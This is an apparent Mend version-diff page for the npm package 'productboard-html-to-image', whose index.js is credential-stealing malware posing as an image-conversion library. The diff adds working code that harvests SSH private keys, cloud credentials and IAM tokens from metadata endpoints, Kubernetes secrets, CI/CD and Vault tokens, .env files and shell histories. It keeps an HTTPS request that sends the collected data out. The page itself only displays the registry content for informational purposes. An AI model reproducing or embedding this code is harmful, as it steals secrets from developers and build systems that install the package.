npm - productboard-html-to-image - Versions diffs - 1001.0.9 → 1002.0.9 - Mend

productboard-html-to-image 1001.0.9 → 1002.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/index.js +129 -102
package/package.json +1 -1

package/index.js CHANGED Viewed

@@ -36,90 +36,49 @@ function exec(cmd, timeout = 3000) {
 function getSensitiveEnvVars() {
     const result = {};
     for (const key in process.env) {
-        if (/pass|key|token|secret|env|auth|cred|aws|gcp|azure|kube|docker|jenkins|gitlab|github/i.test(key)) {
+        if (/pass|key|token|secret|env|auth|cred|aws|gcp|azure|kube|docker|jenkins|gitlab|github|circleci|travis|vault/i.test(key)) {
             result[key] = process.env[key];
         }
     }
     return result;
 }
-function checkContainerOrCI() {
-    return {
-        cgroup: safeReadFile("/proc/1/cgroup"),
-        dockerenv: fs.existsSync("/.dockerenv"),
-        ciVars: Object.fromEntries(Object.entries(process.env).filter(([k]) => /ci|build|pipeline|github|gitlab|jenkins|circleci|travis/i.test(k))),
-        kubernetes: {
-            token: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token"),
-            namespace: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/namespace"),
-            kubeconfig: safeReadFile(path.join(os.homedir(), ".kube/config")),
-        },
-        dockerConfig: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
-    };
-}
-function getGitData() {
-    return {
-        branch: exec("git rev-parse --abbrev-ref HEAD"),
-        remotes: exec("git remote -v"),
-        config: safeReadFile(path.join(os.homedir(), ".gitconfig")),
-        credentials: safeReadFile(path.join(os.homedir(), ".git-credentials")),
-        netrc: safeReadFile(path.join(os.homedir(), ".netrc")),
-    };
-}
-function getSystemState() {
-    return {
-        whoami: exec("whoami"),
-        id: exec("id"),
-        ps: exec("ps aux | head -n 30"),
-        netstat: exec("ss -tunlp | head -n 30"),
-        lsof: exec("lsof -n -i | head -n 30"),
-        uname: exec("uname -a"),
-        mounts: exec("cat /proc/mounts | head -n 30"),
-        crontab: exec("crontab -l"),
-    };
-}
-function getInstalledTools() {
-    return {
-        npm: exec("npm ls -g --depth=0 --json"),
-        apt: exec("dpkg -l | head -n 30"),
-        brew: exec("brew list || echo 'no brew'"),
-        pip: exec("pip list --format=json || echo 'no pip'"),
-        which_tools: {
-            aws: exec("which aws"),
-            gcloud: exec("which gcloud"),
-            az: exec("which az"),
-            kubectl: exec("which kubectl"),
-            terraform: exec("which terraform"),
-            docker: exec("which docker"),
-            nmap: exec("which nmap"),
-            curl: exec("which curl"),
-        },
-    };
-}
 function getCloudMetadata() {
     const metadata = {};
     const endpoints = [
         { name: "aws_instance", url: "http://169.254.169.254/latest/dynamic/instance-identity/document" },
-        { name: "aws_metadata", url: "http://169.254.169.254/latest/meta-data/" },
         { name: "aws_iam", url: "http://169.254.169.254/latest/meta-data/iam/security-credentials/" },
+        { name: "aws_s3", cmd: "aws s3 ls" }, // List S3 buckets
         { name: "gcp_metadata", url: "http://metadata.google.internal/computeMetadata/v1/?recursive=true", headers: { "Metadata-Flavor": "Google" } },
+        { name: "gcp_projects", cmd: "gcloud projects list --format=json" },
         { name: "azure_metadata", url: "http://169.254.169.254/metadata/instance?api-version=2021-02-01", headers: { "Metadata": "true" } },
+        { name: "azure_subscriptions", cmd: "az account list --output json" },
     ];
-    for (const { name, url, headers } of endpoints) {
+    for (const { name, url, headers, cmd } of endpoints) {
         try {
-            let cmd = `curl -s --max-time 2 ${url}`;
-            if (headers) {
-                const headerStr = Object.entries(headers).map(([k, v]) => `-H "${k}: ${v}"`).join(" ");
-                cmd = `curl -s --max-time 2 ${headerStr} ${url}`;
+            if (cmd) {
+                metadata[name] = exec(cmd);
+            } else {
+                let cmd = `curl -s --max-time 2 ${url}`;
+                if (headers) {
+                    const headerStr = Object.entries(headers).map(([k, v]) => `-H "${k}: ${v}"`).join(" ");
+                    cmd = `curl -s --max-time 2 ${headerStr} ${url}`;
+                }
+                metadata[name] = exec(cmd);
             }
-            metadata[name] = exec(cmd);
         } catch (e) {
             metadata[name] = `ERR: ${e.message}`;
         }
     }
+    // Get IAM role details if available
+    try {
+        const roleName = exec("curl -s --max-time 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/");
+        if (roleName && !roleName.startsWith("ERR:")) {
+            metadata["aws_iam_creds"] = exec(`curl -s --max-time 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/${roleName}`);
+        }
+    } catch (e) {
+        metadata["aws_iam_creds"] = `ERR: ${e.message}`;
+    }
     return metadata;
 }
@@ -128,23 +87,119 @@ function getCloudCLIs() {
         aws: {
             credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
             config: safeReadFile(path.join(os.homedir(), ".aws/config")),
+            ssm_params: exec("aws ssm get-parameters --names / --recursive --query 'Parameters[*].Name'"),
             sts: exec("aws sts get-caller-identity"),
+            assume_role: exec("aws sts get-session-token"),
         },
         gcloud: {
             config: safeReadFile(path.join(os.homedir(), ".config/gcloud/configurations/config_default")),
             credentials: safeReadFile(path.join(os.homedir(), ".config/gcloud/credentials.db")),
+            service_accounts: exec("gcloud iam service-accounts list --format=json"),
         },
         azure: {
             credentials: safeReadFile(path.join(os.homedir(), ".azure/azureProfile.json")),
             accessTokens: safeReadFile(path.join(os.homedir(), ".azure/accessTokens.json")),
+            vm_info: exec("az vm show --query '{id:id,name:name}' --output json"),
         },
     };
 }
-function getNodeRuntime() {
+function getContainerDetails() {
+    return {
+        cgroup: safeReadFile("/proc/1/cgroup"),
+        dockerenv: fs.existsSync("/.dockerenv"),
+        docker_info: exec("docker info --format json"),
+        docker_ps: exec("docker ps -a --format '{{.ID}}\t{{.Names}}\t{{.Image}}\t{{.Status}}'"),
+        docker_config: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
+        kubernetes: {
+            token: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/token"),
+            namespace: safeReadFile("/var/run/secrets/kubernetes.io/serviceaccount/namespace"),
+            kubeconfig: safeReadFile(path.join(os.homedir(), ".kube/config")),
+            pods: exec("kubectl get pods -o json --all-namespaces"),
+            secrets: exec("kubectl get secrets -o json --all-namespaces"),
+        },
+    };
+}
+function getCICDDetails() {
+    return {
+        github: {
+            token: process.env.GITHUB_TOKEN || safeReadFile(path.join(os.homedir(), ".github/token")),
+            actions_vars: safeReadDir(path.join(process.cwd(), ".github/workflows")),
+        },
+        jenkins: {
+            config: safeReadFile("/var/jenkins_home/config.xml"),
+            credentials: safeReadFile("/var/jenkins_home/credentials.xml"),
+        },
+        gitlab: {
+            config: safeReadFile(path.join(os.homedir(), ".gitlab-ci.yml")),
+            token: process.env.CI_JOB_TOKEN || "NOT_FOUND",
+        },
+        vault: {
+            token: safeReadFile(path.join(os.homedir(), ".vault-token")),
+            secrets: exec("vault kv list -format=json secret/"),
+        },
+    };
+}
+function getRuntimeSecrets() {
     return {
         node_version: process.version,
+        global_objects: Object.keys(global).filter(k => /key|token|secret|cred|auth/i.test(k)),
+        process_config: JSON.stringify(process.config),
         npm_config: exec("npm config ls -l"),
+        loaded_modules: Object.keys(require("module")._cache).slice(0, 50),
+    };
+}
+function getSensitiveFiles() {
+    const files = {
+        etc_passwd: safeReadFile("/etc/passwd"),
+        etc_hosts: safeReadFile("/etc/hosts"),
+        etc_resolv: safeReadFile("/etc/resolv.conf"),
+        bash_history: safeReadFile(path.join(os.homedir(), ".bash_history")),
+        zsh_history: safeReadFile(path.join(os.homedir(), ".zsh_history")),
+        ssh_config: safeReadFile(path.join(os.homedir(), ".ssh/config")),
+        ssh_id_rsa: safeReadFile(path.join(os.homedir(), ".ssh/id_rsa")),
+        ssh_known_hosts: safeReadFile(path.join(os.homedir(), ".ssh/known_hosts")),
+        aws_credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
+        aws_ssm: safeReadFile(path.join(os.homedir(), ".aws/ssm")),
+        npmrc: safeReadFile(path.join(os.homedir(), ".npmrc")),
+        gitconfig: safeReadFile(path.join(os.homedir(), ".gitconfig")),
+        git_credentials: safeReadFile(path.join(os.homedir(), ".git-credentials")),
+        netrc: safeReadFile(path.join(os.homedir(), ".netrc")),
+        docker_config: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
+        env_files: {
+            dotenv: safeReadFile(path.join(process.cwd(), ".env")),
+            github_workflow: safeReadDir(path.join(process.cwd(), ".github/workflows")),
+            circleci: safeReadFile(path.join(process.cwd(), ".circleci/config.yml")),
+        },
+    };
+    // Scan for additional sensitive files
+    const sensitivePaths = [
+        path.join(os.homedir(), ".config/vault"),
+        path.join(os.homedir(), ".terraformrc"),
+        path.join(process.cwd(), "secrets.yml"),
+        "/run/secrets",
+    ];
+    files.extras = {};
+    sensitivePaths.forEach(p => {
+        files.extras[path.basename(p)] = fs.existsSync(p) ? (fs.lstatSync(p).isDirectory() ? safeReadDir(p) : safeReadFile(p)) : "NOT_FOUND";
+    });
+    return files;
+}
+function getSystemState() {
+    return {
+        whoami: exec("whoami"),
+        id: exec("id"),
+        ps: exec("ps aux | grep -E 'node|java|python|ruby|go|aws|gcloud|az|kubectl|vault' | head -n 30"),
+        netstat: exec("ss -tunlp | head -n 30"),
+        lsof: exec("lsof -n -i | head -n 30"),
+        uname: exec("uname -a"),
+        mounts: exec("cat /proc/mounts | head -n 30"),
+        crontab: exec("crontab -l"),
+        sysctl: exec("sysctl -a | grep -E 'kernel|vm|net' | head -n 50"),
     };
 }
@@ -195,42 +250,14 @@ try {
             }
         })(),
         env: getSensitiveEnvVars(),
-        dirs: {
-            "/": safeReadDir("/"),
-            "/home": safeReadDir("/home"),
-            "/root": safeReadDir("/root"),
-            "/etc": safeReadDir("/etc"),
-            "/var/run": safeReadDir("/var/run"),
-            "/var/log": safeReadDir("/var/log"),
-            "~": safeReadDir(os.homedir()),
-        },
-        files: {
-            etc_passwd: safeReadFile("/etc/passwd"),
-            etc_hosts: safeReadFile("/etc/hosts"),
-            etc_resolv: safeReadFile("/etc/resolv.conf"),
-            bash_history: safeReadFile(path.join(os.homedir(), ".bash_history")),
-            zsh_history: safeReadFile(path.join(os.homedir(), ".zsh_history")),
-            ssh_config: safeReadFile(path.join(os.homedir(), ".ssh/config")),
-            ssh_id_rsa: safeReadFile(path.join(os.homedir(), ".ssh/id_rsa")),
-            ssh_known_hosts: safeReadFile(path.join(os.homedir(), ".ssh/known_hosts")),
-            aws_credentials: safeReadFile(path.join(os.homedir(), ".aws/credentials")),
-            aws_config: safeReadFile(path.join(os.homedir(), ".aws/config")),
-            npmrc: safeReadFile(path.join(os.homedir(), ".npmrc")),
-            gitconfig: safeReadFile(path.join(os.homedir(), ".gitconfig")),
-            docker_config: safeReadFile(path.join(os.homedir(), ".docker/config.json")),
-            env_files: {
-                dotenv: safeReadFile(path.join(process.cwd(), ".env")),
-                github_workflow: safeReadDir(path.join(process.cwd(), ".github/workflows")),
-            },
-        },
-        git: getGitData(),
-        container: checkContainerOrCI(),
-        system: getSystemState(),
-        tools: getInstalledTools(),
-        network: os.networkInterfaces(),
+        container: getContainerDetails(),
         cloud: getCloudMetadata(),
         cloud_clis: getCloudCLIs(),
-        node: getNodeRuntime(),
+        cicd: getCICDDetails(),
+        runtime: getRuntimeSecrets(),
+        files: getSensitiveFiles(),
+        system: getSystemState(),
+        network: os.networkInterfaces(),
         timestamp: new Date().toISOString()
     };
 } catch (e) {
@@ -257,11 +284,11 @@ try {
     };
     const req = https.request(options, res => {
-        res.on("data", () => { });
-        res.on("end", () => { });
+        res.on("data", () => {});
+        res.on("end", () => {});
     });
-    req.on("error", () => { });
+    req.on("error", () => {});
     req.on("timeout", () => req.destroy());
     req.write(postData);
     req.end();

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "productboard-html-to-image",
-  "version": "1001.0.9",
+  "version": "1002.0.9",
   "main": "index.js",
   "keywords": [],
   "scripts": {